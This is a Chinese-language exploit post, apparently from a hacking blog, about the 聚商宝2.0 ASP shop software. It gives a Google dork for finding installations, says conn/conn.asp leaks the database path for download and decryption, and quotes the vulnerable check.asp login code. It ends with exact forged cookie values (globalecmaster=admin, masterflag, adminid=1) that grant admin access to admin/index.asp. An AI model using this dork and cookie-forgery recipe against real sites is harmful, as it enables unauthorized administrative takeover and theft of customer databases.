FROM www.st999.cn/blog  BY 久久久电脑

程序：聚商宝2.0

google关键字：intext:技术支持:奔明科技 聚商宝

前几天遇到了个程序叫聚商宝，把源码下载过来了，今天才有时间简单的看了看。。。

漏洞：暴库以及后台cookies欺骗

1)直接访问conn/conn.asp 暴出数据库地址，下载，解密，登录后台

2)cookies欺骗，admin文件夹下check.asp文件中的代码片段：

dim uid,upwd www.2cto.com
uid=Replace_Text(Request.Form("userid"))
upwd=md5(Replace_Text(Request.Form("password")),16)
Verifycode=Replace_Text(request.Form("verifycode"))
 
 if not isnumeric(Verifycode) then
 Call Logerr()
 Call  ErroFy()
 end if

if Cint(Verifycode)<>Session("SafeCode") then
 Call  ErroFy()
 Sub ErroFy()
  response.write"<table cellpadding=2 cellspacing=1 border=0 width=100% class=tableBorder align=center>"
  response.write"<TR>"
  response.write"<TH class=tableHeaderText colSpan=2 height=25>出现错误提示</TH>"
  response.write"<TR><tr><td height=85 valign=top class=forumRow><div align=center><br><br>验证码错误！</div></td></tr>"
  response.write"<tr align=center><td height=30 class=forumRowHighlight><a href='login.asp'>&lt;&lt; 返回上一页</a></td>"
  response.write"</tr>"
  response.write"</table>"
  Response.End()
 End Sub
else

 Set rs=server.createobject("adodb.recordset")
 sqltext="select * from benming_master where Username='" & uid & "' and [PassWord]='" & upwd & "'"
 rs.open sqltext,conn,1,1
 If Rs.Eof And Rs.Bof Then

  response.write"<table cellpadding=2 cellspacing=1 border=0 width=100% class=tableBorder align=center>"
  response.write"<TR>"
  response.write"<TH class=tableHeaderText colSpan=2 height=25>出现错误提示</TH>"
  response.write"<TR><tr><td height=85 valign=top class=forumRow><div align=center><br><br>登陆名或密码不正确！</div></td></tr>"
  response.write"<tr align=center><td height=30 class=forumRowHighlight><a href='login.asp'>&lt;&lt; 返回上一页</a></td>"
  response.write"</tr>"
  response.write"</table>"
  
 else
     Response.Cookies("globalecmaster")=rs("username")
     Response.Cookies("masterflag")=rs("flag")
     Response.Cookies("adminid")=rs("id")
     LastLogin=Date()
  LastLoginIP=getIP()
  sql="update benming_master set LastLogin='"&LastLogin&"',LastLoginIP='"&LastLoginIP&"' where username='"&uid&"'"
  
     conn.execute(sql)
  response.write"<table cellpadding=2 cellspacing=1 border=0 width=100% class=tableBorder align=center>"
  response.write"<TR>"
  response.write"<TH class=tableHeaderText colSpan=2 height=25>登陆成功提示</TH>"
  response.write"<TR><tr><td height=85 valign=top class=forumRow><div align=center><br><br>成功通过网站后台管理员身份认证！<br><br>2秒后自动进入后台...</div></td></tr>"
  response.write"<tr align=center><td height=30 class=forumRowHighlight><a href='index.asp'>进入后台管理</a></td>"
  response.write"</tr>"
  response.write"</table>"
%>
<meta HTTP-EQUIV=refresh Content='2;url=index.asp'>
<%
 end if
 rs.close
 set rs=nothing
end if

利用方法：用啊D直接访问后台，修改如下cookie，然后访问admin/index.asp登录。

globalecmaster=admin; masterflag=01%2C%2002%2C%2003%2C%2004%

2C%2005%2C%2006%2C%2007%2C%2008%2C%2009%2C%20010; adminid=1